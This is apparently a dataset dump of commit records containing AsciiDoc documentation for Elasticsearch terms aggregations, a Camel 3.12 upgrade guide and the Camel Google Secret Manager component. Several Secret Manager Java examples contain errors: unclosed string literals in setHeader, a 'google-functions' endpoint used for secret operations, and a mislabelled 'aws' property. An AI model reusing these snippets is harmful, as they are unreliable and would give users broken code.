Script\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"script\" : \"'Gender: ' +_value\"\n }\n }\n }\n}\n--------------------------------------------------\n\n\n==== Filtering Values\n\nIt is possible to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on regular expressions.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : \".*sport.*\",\n \"exclude\" : \"water_.*\"\n }\n }\n }\n}\n--------------------------------------------------\n\nIn the above example, buckets will be created for all the tags that has the word `sport` in them, except those starting\nwith `water_` (so the tag `water_sports` will no be aggregated). The `include` regular expression will determine what\nvalues are \"allowed\" to be aggregated, while the `exclude` determines the values that should not be aggregated. When\nboth are defined, the `exclude` has precedence, meaning, the `include` is evaluated first and only then the `exclude`.\n\nThe regular expression are based on the Java(TM) http:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html[Pattern],\nand as such, they it is also possible to pass in flags that will determine how the compiled regular expression will work:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : {\n \"pattern\" : \".*sport.*\",\n \"flags\" : \"CANON_EQ|CASE_INSENSITIVE\" <1>\n },\n \"exclude\" : {\n \"pattern\" : \"water_.*\",\n \"flags\" : \"CANON_EQ|CASE_INSENSITIVE\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> the flags are concatenated using the `|` character as a separator\n\nThe possible flags that can be used are:\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#CANON_EQ[`CANON_EQ`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#CASE_INSENSITIVE[`CASE_INSENSITIVE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#COMMENTS[`COMMENTS`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#DOTALL[`DOTALL`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#LITERAL[`LITERAL`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#MULTILINE[`MULTILINE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNICODE_CASE[`UNICODE_CASE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNICODE_CHARACTER_CLASS[`UNICODE_CHARACTER_CLASS`] and\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNIX_LINES[`UNIX_LINES`]\n\n==== Multi-field terms aggregation\n\nThe `terms` aggregation does not support collecting terms from multiple fields\nin the same document. The reason is that the `terms` agg doesn't collect the\nstring term values themselves, but rather uses\n<<search-aggregations-bucket-terms-aggregation-execution-hint,global ordinals>>\nto produce a list of all of the unique values in the field. Global ordinals\nresults in an important performance boost which would not be possible across\nmultiple fields.\n\nThere are two approaches that you can use to perform a `terms` agg across\nmultiple fields:\n\n<<search-aggregations-bucket-terms-aggregation-script,Script>>::\n\nUse a script to retrieve terms from multiple fields. This disables the global\nordinals optimization and will be slower than collecting terms from a single\nfield, but it gives you the flexibility to implement this option at search\ntime.\n\n<<copy-to,`copy_to` field>>::\n\nIf you know ahead of time that you want to collect the terms from two or more\nfields, then use `copy_to` in your mapping to create a new dedicated field at\nindex time which contains the values from both fields. You can aggregate on\nthis single field, which will benefit from the global ordinals optimization.\n\n==== Collect mode\n\nadded[1.3.0] Deferring calculation of child aggregations\n\nFor fields with many unique terms and a small number of required results it can be more efficient to delay the calculation\nof child aggregations until the top parent-level aggs have been pruned. Ordinarily, all branches of the aggregation tree\nare expanded in one depth-first pass and only then any pruning occurs. In some rare scenarios this can be very wasteful and can hit memory constraints.\nAn example problem scenario is querying a movie database for the 10 most popular actors and their 5 most common co-stars:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nEven though the number of movies may be comparatively small and we want only 50 result buckets there is a combinatorial explosion of buckets\nduring calculation - a single movie will produce n\u00b2 buckets where n is the number of actors. The sane option would be to first determine\nthe 10 most popular actors and only then examine the top co-stars for these 10 actors. This alternative strategy is what we call the `breadth_first` collection\nmode as opposed to the default `depth_first` mode:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10,\n \"collect_mode\" : \"breadth_first\"\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n\nWhen using `breadth_first` mode the set of documents that fall into the uppermost buckets are\ncached for subsequent replay so there is a memory overhead in doing this which is linear with the number of matching documents.\nIn most requests the volume of buckets generated is smaller than the number of documents that fall into them so the default `depth_first`\ncollection mode is normally the best bet but occasionally the `breadth_first` strategy can be significantly more efficient. Currently\nelasticsearch will always use the `depth_first` collect_mode unless explicitly instructed to use `breadth_first` as in the above example.\nNote that the `order` parameter can still be used to refer to data from a child aggregation when using the `breadth_first` setting - the parent\naggregation understands that this child aggregation will need to be called first before any of the other child aggregations.\n\nWARNING: It is not possible to nest aggregations such as `top_hits` which require access to match score information under an aggregation that uses\nthe `breadth_first` collection mode. This is because this would require a RAM buffer to hold the float score value for every document and\nthis would typically be too costly in terms of RAM.\n\n[[search-aggregations-bucket-terms-aggregation-execution-hint]]\n==== Execution hint\n\nadded[1.2.0] Added the `global_ordinals`, `global_ordinals_hash` and `global_ordinals_low_cardinality` execution modes\n\ndeprecated[1.3.0] Removed the `ordinals` execution mode\n\nThere are different mechanisms by which terms aggregations can be executed:\n\n - by using field values directly in order to aggregate data per-bucket (`map`)\n - by using ordinals of the field and preemptively allocating one bucket per ordinal value (`global_ordinals`)\n - by using ordinals of the field and dynamically allocating one bucket per ordinal value (`global_ordinals_hash`)\n - by using per-segment ordinals to compute counts and remap these counts to global counts using global ordinals (`global_ordinals_low_cardinality`)\n\nElasticsearch tries to have sensible defaults so this is something that generally doesn't need to be configured.\n\n`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution modes\nare significantly faster. By default, `map` is only used when running an aggregation on scripts, since they don't have\nordinals.\n\n`global_ordinals_low_cardinality` only works for leaf terms aggregations but is usually the fastest execution mode. Memory\nusage is linear with the number of unique values in the field, so it is only enabled by default on low-cardinality fields.\n\n`global_ordinals` is the second fastest option, but the fact that it preemptively allocates buckets can be memory-intensive,\nespecially if you have one or more sub aggregations. It is used by default on top-level terms aggregations.\n\n`global_ordinals_hash` on the contrary to `global_ordinals` and `global_ordinals_low_cardinality` allocates buckets dynamically\nso memory usage is linear to the number of values of the documents that are part of the aggregation scope. It is used by default\nin inner aggregations.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"execution_hint\": \"map\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> the possible values are `map`, `global_ordinals`, `global_ordinals_hash` and `global_ordinals_low_cardinality`\n\nPlease note that Elasticsearch will ignore this execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d76116e92eda974c76de1460d81deb2924385e5b","subject":"CAMEL-16183: Remove <proxy> in old spring xml XSD which is deprecated and no longer in use.","message":"CAMEL-16183: Remove <proxy> in old spring xml XSD which is deprecated and no longer in use.\n","repos":"christophd\/camel,christophd\/camel,adessaigne\/camel,pax95\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,tadayosi\/camel,tdiesler\/camel,apache\/camel,adessaigne\/camel,tdiesler\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,tadayosi\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,cunningt\/camel,apache\/camel,tdiesler\/camel,pax95\/camel,adessaigne\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel,apache\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_12.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_12.adoc","new_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.11 to 3.12\n\n=== API changes\n\nThe method `getComponentNames` and `getLanguageNames` on `CamelContext` has changed to\nreturn `Set<String>` instead of `List<String>`.\n\nAdded `getExchangePattern` to `Endpoint` which is a method that already exists on `DefaultEndpoint`.\nHowever the method is needed to be exposed in the API as well.\n\nThe `ThroughputLogger` has changed the return type from `int` to `long` in the `getReceivedCounter` method.\n\nRemoved the `dataSonnet(Expression)` methods from `RouteBuilder` as they should not be used;\nuse the methods that take `String` as type.\n\n=== Data Formats\n\nThe `camel-asn1` data format has renamed the option `clazzName` to `unmarshalType`.\nThe `camel-avro` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-avro` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-avro` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-cbor` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-cbor` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-jacksonxml` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-jacksonxml` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-jacksonxml` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-json` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-json` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-json` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-protobuf` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-protobuf` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-protobuf` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-yaml` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\n\n=== camel-catalog\n\nRemove the APIs to return the website documentation in ascii doc and html format, it is the methods\nwith naming pattern `...AsciiDoc` and `...HtmlDoc`.\n\n=== camel-cdi\n\nThe XML DSL with `camel-cdi` has removed the deprecated `<proxy>` functionality.\n\n=== camel-jms\n\nThe `camel-jms` component now better support Apache Artemis in streaming mode for large messages support,\nwhen Artemis is using a pooled connection pool (previously pooled was not supported). Now the option `artemisStreamingEnabled`\nmust explicit be set to `true` to enable support for Artemis streaming mode. Previously Camel tried to auto-detect this.\n\n=== camel-google-sheets\n\nThe `google-sheets-stream` component has changed the syntax, from: `google-sheets-stream:apiName` to: `google-sheets-stream:spreadsheetId`\n\nThe old `apiName` option was not in use, and therefore it has been replaced with `spreadsheetId`\nwhich used to be query parameter.\n\n=== camel-kamelet \/ route templates\n\nKamelet parameters that are named such as `host`, `port` are now always used with their configured value.\nBefore the value in use may be from an ENV variable with the same name.\n\n=== camel-spark\n\nThe `camel-spark` component has been upgraded from Spark 2.x to 3.x.\n\n=== camel-influxdb\n\nThe `camel-influxdb` won't autocreate the database if not present anymore.\nWith CAMEL-16892 we introduced the checkDatabaseExistence and autoCreateDatabase options for this purpose. \nBoth of the options are false by default. So, you'll need to set both to true if you want to have the older releases behavior, or create the database yourself before using the camel component.\n\n=== camel-huawei\n\nAll Huawei Cloud components use AK\/SK as security keys to authenticate against the hauwei cloud backend services. Initally AK was mapped to authenticationKey in the endpoint class. To be in-line with Huawei Cloud's naming conventions, we have renamed this option from `authenticationKey` to `accessKey` for all components. This is a breaking change for users who are already using huawei cloud components until version 3.11.x. ","old_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.11 to 3.12\n\n=== API changes\n\nThe method `getComponentNames` and `getLanguageNames` on `CamelContext` has changed to\nreturn `Set<String>` instead of `List<String>`.\n\nAdded `getExchangePattern` to `Endpoint` which is a method that already exists on `DefaultEndpoint`.\nHowever the method is needed to be exposed in the API as well.\n\nThe `ThroughputLogger` has changed the return type from `int` to `long` in the `getReceivedCounter` method.\n\nRemoved the `dataSonnet(Expression)` methods from `RouteBuilder` as they should not be used;\nuse the methods that take `String` as type.\n\n=== Data Formats\n\nThe `camel-asn1` data format has renamed the option `clazzName` to `unmarshalType`.\nThe `camel-avro` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-avro` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-avro` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-cbor` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-cbor` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-jacksonxml` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-jacksonxml` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-jacksonxml` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-json` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-json` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-json` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-protobuf` data format has renamed the option `collectionTypeName` to `collectionType`.\nThe `camel-protobuf` data format has renamed the option `jsonViewTypeName` to `jsonView`.\nThe `camel-protobuf` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\nThe `camel-yaml` data format has renamed the option `unmarshalTypeName` to `unmarshalType`.\n\n=== camel-catalog\n\nRemove the APIs to return the website documentation in ascii doc and html format, it is the methods\nwith naming pattern `...AsciiDoc` and `...HtmlDoc`.\n\n=== camel-jms\n\nThe `camel-jms` component now better support Apache Artemis in streaming mode for large messages support,\nwhen Artemis is using a pooled connection pool (previously pooled was not supported). Now the option `artemisStreamingEnabled`\nmust explicit be set to `true` to enable support for Artemis streaming mode. Previously Camel tried to auto-detect this.\n\n=== camel-google-sheets\n\nThe `google-sheets-stream` component has changed the syntax, from: `google-sheets-stream:apiName` to: `google-sheets-stream:spreadsheetId`\n\nThe old `apiName` option was not in use, and therefore it has been replaced with `spreadsheetId`\nwhich used to be query parameter.\n\n=== camel-kamelet \/ route templates\n\nKamelet parameters that are named such as `host`, `port` are now always used with their configured value.\nBefore the value in use may be from an ENV variable with the same name.\n\n=== camel-spark\n\nThe `camel-spark` component has been upgraded from Spark 2.x to 3.x.\n\n=== camel-influxdb\n\nThe `camel-influxdb` won't autocreate the database if not present anymore.\nWith CAMEL-16892 we introduced the checkDatabaseExistence and autoCreateDatabase options for this purpose. \nBoth of the options are false by default. So, you'll need to set both to true if you want to have the older releases behavior, or create the database yourself before using the camel component.\n\n=== camel-huawei\n\nAll Huawei Cloud components use AK\/SK as security keys to authenticate against the hauwei cloud backend services. Initally AK was mapped to authenticationKey in the endpoint class. To be in-line with Huawei Cloud's naming conventions, we have renamed this option from `authenticationKey` to `accessKey` for all components. This is a breaking change for users who are already using huawei cloud components until version 3.11.x. ","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b99371333186c8e7d8a1aa83c5724d60d351054","subject":"Camel Google Secret Manager: Cleanup documentation","message":"Camel Google Secret Manager: Cleanup documentation\n","repos":"apache\/camel,apache\/camel,cunningt\/camel,cunningt\/camel,apache\/camel,christophd\/camel,cunningt\/camel,apache\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,tadayosi\/camel,apache\/camel,cunningt\/camel,tadayosi\/camel,tadayosi\/camel","old_file":"components\/camel-google\/camel-google-secret-manager\/src\/main\/docs\/google-secret-manager-component.adoc","new_file":"components\/camel-google\/camel-google-secret-manager\/src\/main\/docs\/google-secret-manager-component.adoc","new_contents":"= Google Secret Manager Component\n:doctitle: Google Secret Manager\n:shortname: google-secret-manager\n:artifactid: camel-google-secret-manager\n:description: Manage Google Secret Manager Secrets\n:since: 3.16\n:supportlevel: Stable\n:component-header: Only producer is supported\n\/\/Manually maintained attributes\n:group: Google\n:camel-spring-boot-name: google-secret-manager\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Google Secret Manager component provides access to https:\/\/cloud.google.com\/secret-manager\/[Google Cloud Secret Manager]\n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-google-secret-manager<\/artifactId>\n <!-- use the same version as your Camel core version -->\n <version>x.x.x<\/version>\n<\/dependency>\n\n------------------------------------------------------\n\n[[GoogleSecretManager-AuthenticationConfiguration]]\n\n== Authentication Configuration\n\nGoogle Secret Manager component authentication is targeted for use with the GCP Service Accounts.\nFor more information please refer to https:\/\/github.com\/googleapis\/google-cloud-java#authentication[Google Cloud Authentication].\n\nWhen you have the **service account key** you can provide authentication credentials to your application code.\nGoogle security credentials can be set through the component endpoint:\n\n[source,java]\n--------------------------------------------------------\nString endpoint = \"google-secret-manager:\/\/myCamelFunction?serviceAccountKey=\/home\/user\/Downloads\/my-key.json\";\n--------------------------------------------------------\n\nOr by setting the environment variable `GOOGLE_APPLICATION_CREDENTIALS` :\n\n--------------------------------------------------------\nexport GOOGLE_APPLICATION_CREDENTIALS=\"\/home\/user\/Downloads\/my-key.json\"\n--------------------------------------------------------\n\n\n== URI Format\n\n--------------------------------------------------------\ngoogle-secret-manager:\/\/functionName[?options]\n--------------------------------------------------------\n\nYou can append query options to the URI in the following format,\n`?options=value&option2=value&...`\n\nFor example in order to call the function `myCamelFunction` from the project `myProject` and location `us-central1`, use the following snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"google-secret-manager:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=createSecret\")\n .to(\"direct:test\");\n--------------------------------------------------------------------------------\n\n\n\n\/\/ component-configure options: START\n\n\/\/ component-configure options: END\n\n\/\/ component options: START\ninclude::partial$component-configure-options.adoc[]\ninclude::partial$component-endpoint-options.adoc[]\n\/\/ component options: END\n\n\/\/ endpoint options: START\n\n\/\/ endpoint options: END\n\/\/ component headers: START\ninclude::partial$component-endpoint-headers.adoc[]\n\/\/ component headers: END\n\n=== Using GCP Secret Manager Properties Source\n\nTo use GCP Secret Manager you need to provide _serviceAccountKey_ file and GCP _projectId_.\nThis can be done using environmental variables before starting the application:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_SERVICE_ACCOUNT_KEY=file:\/\/\/\/path\/to\/service.accountkey\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nYou can also configure the credentials in the `application.properties` file such as:\n\n[source,properties]\n----\ncamel.vault.gcp.serviceAccountKey = serviceAccountKey\ncamel.vault.gcp.projectId = projectId\n----\n\nIf you want instead to use the https:\/\/cloud.google.com\/docs\/authentication\/production[GCP default client instance], you'll need to provide the following env variables:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_USE_DEFAULT_INSTANCE=true\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nYou can also configure the credentials in the `application.properties` file such as:\n\n[source,properties]\n----\ncamel.vault.gcp.useDefaultInstance = true\ncamel.vault.aws.projectId = region\n----\n\nAt this point you'll be able to reference a property in the following way by using `gcp:` as prefix in the `{{ }}` syntax:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nWhere `route` will be the name of the secret stored in the GCP Secret Manager Service.\n\nYou could specify a default value in case the secret is not present on GCP Secret Manager:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route:default}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nIn this case if the secret doesn't exist, the property will fallback to \"default\" as value.\n\nAlso, you are able to get particular field of the secret, if you have for example a secret named database of this form:\n\n[source,json]\n----\n{\n \"username\": \"admin\",\n \"password\": \"password123\",\n \"engine\": \"postgres\",\n \"host\": \"127.0.0.1\",\n \"port\": \"3128\",\n \"dbname\": \"db\"\n}\n----\n\nYou're able to do get single secret value in your route, like for example:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nOr re-use the property as part of an endpoint.\n\nYou could specify a default value in case the particular field of secret is not present on GCP Secret Manager:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username:admin}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nIn this case if the secret doesn't exist or the secret exists, but the username field is not part of the secret, the property will fallback to \"admin\" as value.\n\nThere is also the syntax to get a particular version of the secret for both the approach, with field\/default value specified or only with secret:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the RAW route secret with version '1'.\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route:default@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the route secret value with version '1' or default value in case the secret doesn't exist or the version doesn't exist.\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username:admin@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the username field of the database secret with version '1' or admin in case the secret doesn't exist or the version doesn't exist.\n\nThere are only two requirements: \n- Adding `camel-google-secret-manager` JAR to your Camel application.\n- Give the service account used permissions to do operation at secret management level (for example accessing the secret payload, or being admin of secret manager service)\n\n=== Automatic Camel context reloading on Secret Refresh\n\nBeing able to reload Camel context on a Secret Refresh, could be done by specifying the usual credentials (the same used for Google Secret Manager Property Function).\n\nWith Environment variables:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_USE_DEFAULT_INSTANCE=true\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nor as plain Camel main properties:\n\n[source,properties]\n----\ncamel.vault.gcp.useDefaultInstance = true\ncamel.vault.aws.projectId = projectId\n----\n\nOr by specifying a path to a service account key file, instead of using the default instance.\n\nTo enable the automatic refresh you'll need additional properties to set:\n\n[source,properties]\n----\ncamel.vault.gcp.projectId= projectId\ncamel.vault.gcp.refreshEnabled=true\ncamel.vault.gcp.refreshPeriod=60000\ncamel.vault.gcp.secrets=hello*\ncamel.vault.gcp.subscriptionName=subscriptionName\ncamel.main.context-reload-enabled = true\n----\n\nwhere `camel.vault.gcp.refreshEnabled` will enable the automatic context reload, `camel.vault.gcp.refreshPeriod` is the interval of time between two different checks for update events and `camel.vault.gcp.secrets` is a regex representing the secrets we want to track for updates.\n\nNote that `camel.vault.gcp.secrets` is not mandatory: if not specified the task responsible for checking updates events will take into accounts or the properties with an `gcp:` prefix.\n\nThe `camel.vault.gcp.subscriptionName` is the subscription name created in relation to the Google PubSub topic associated with the tracked secrets.\n\nThis mechanism while make use of the notification system related to Google Secret Manager: through this feature, every secret could be associated to one up to ten Google Pubsub Topics. These topics will receive \nevents related to life cycle of the secret.\n\nThere are only two requirements: \n- Adding `camel-google-secret-manager` JAR to your Camel application.\n- Give the service account used permissions to do operation at secret management level (for example accessing the secret payload, or being admin of secret manager service and also have permission over the Pubsub service)\n\n=== Google Secret Manager Producer operations\n\nGoogle Functions component provides the following operation on the producer side:\n\n- createSecret\n- getSecretVersion\n- deleteSecret\n- listSecrets\n\nIf you don't specify an operation by default the producer will use the `createSecret` operation.\n\n=== Google Secret Manager Producer Operation examples\n\n- createSecret: This operation will create a secret in the Secret Manager service\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .setBody(constant(\"hello\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=createSecret\")\n .log(\"body:${body}\")\n--------------------------------------------------------------------------------\n\n- getSecretVersion: This operation will retrieve a secret value with latest version in the Secret Manager service\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=getSecretVersion\")\n .log(\"body:${body}\")\n--------------------------------------------------------------------------------\n\nThis will log the value of the secret \"test\".\n\n- deleteSecret: This operation will delete a secret\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=deleteSecret\")\n--------------------------------------------------------------------------------\n\n- listSecrets: This operation will return the secrets list for the project myProject\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=listSecrets\")\n--------------------------------------------------------------------------------\n\n\ninclude::spring-boot:partial$starter.adoc[]\n","old_contents":"= Google Secret Manager Component\n:doctitle: Google Secret Manager\n:shortname: google-secret-manager\n:artifactid: camel-google-secret-manager\n:description: Manage Google Secret Manager Secrets\n:since: 3.16\n:supportlevel: Stable\n:component-header: Only producer is supported\n\/\/Manually maintained attributes\n:group: Google\n:camel-spring-boot-name: google-secret-manager\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Google Secret Manager component provides access to https:\/\/cloud.google.com\/secret-manager\/[Google Cloud Secret Manager]\n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-google-secret-manager<\/artifactId>\n <!-- use the same version as your Camel core version -->\n <version>x.x.x<\/version>\n<\/dependency>\n\n------------------------------------------------------\n\n[[GoogleSecretManager-AuthenticationConfiguration]]\n\n== Authentication Configuration\n\nGoogle Secret Manager component authentication is targeted for use with the GCP Service Accounts.\nFor more information please refer to https:\/\/github.com\/googleapis\/google-cloud-java#authentication[Google Cloud Authentication].\n\nWhen you have the **service account key** you can provide authentication credentials to your application code.\nGoogle security credentials can be set through the component endpoint:\n\n[source,java]\n--------------------------------------------------------\nString endpoint = \"google-secret-manager:\/\/myCamelFunction?serviceAccountKey=\/home\/user\/Downloads\/my-key.json\";\n--------------------------------------------------------\n\nOr by setting the environment variable `GOOGLE_APPLICATION_CREDENTIALS` :\n\n--------------------------------------------------------\nexport GOOGLE_APPLICATION_CREDENTIALS=\"\/home\/user\/Downloads\/my-key.json\"\n--------------------------------------------------------\n\n\n== URI Format\n\n--------------------------------------------------------\ngoogle-secret-manager:\/\/functionName[?options]\n--------------------------------------------------------\n\nYou can append query options to the URI in the following format,\n`?options=value&option2=value&...`\n\nFor example in order to call the function `myCamelFunction` from the project `myProject` and location `us-central1`, use the following snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"google-secret-manager:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=createSecret\")\n .to(\"direct:test\");\n--------------------------------------------------------------------------------\n\n\n\n\/\/ component-configure options: START\n\n\/\/ component-configure options: END\n\n\/\/ component options: START\ninclude::partial$component-configure-options.adoc[]\ninclude::partial$component-endpoint-options.adoc[]\n\/\/ component options: END\n\n\/\/ endpoint options: START\n\n\/\/ endpoint options: END\n\/\/ component headers: START\ninclude::partial$component-endpoint-headers.adoc[]\n\/\/ component headers: END\n\n=== Using GCP Secret Manager Properties Source\n\nTo use GCP Secret Manager you need to provide _serviceAccountKey_ file and GCP _projectId_.\nThis can be done using environmental variables before starting the application:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_SERVICE_ACCOUNT_KEY=file:\/\/\/\/path\/to\/service.accountkey\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nYou can also configure the credentials in the `application.properties` file such as:\n\n[source,properties]\n----\ncamel.vault.gcp.serviceAccountKey = accessKey\ncamel.vault.gcp.projectId = secretKey\n----\n\nIf you want instead to use the 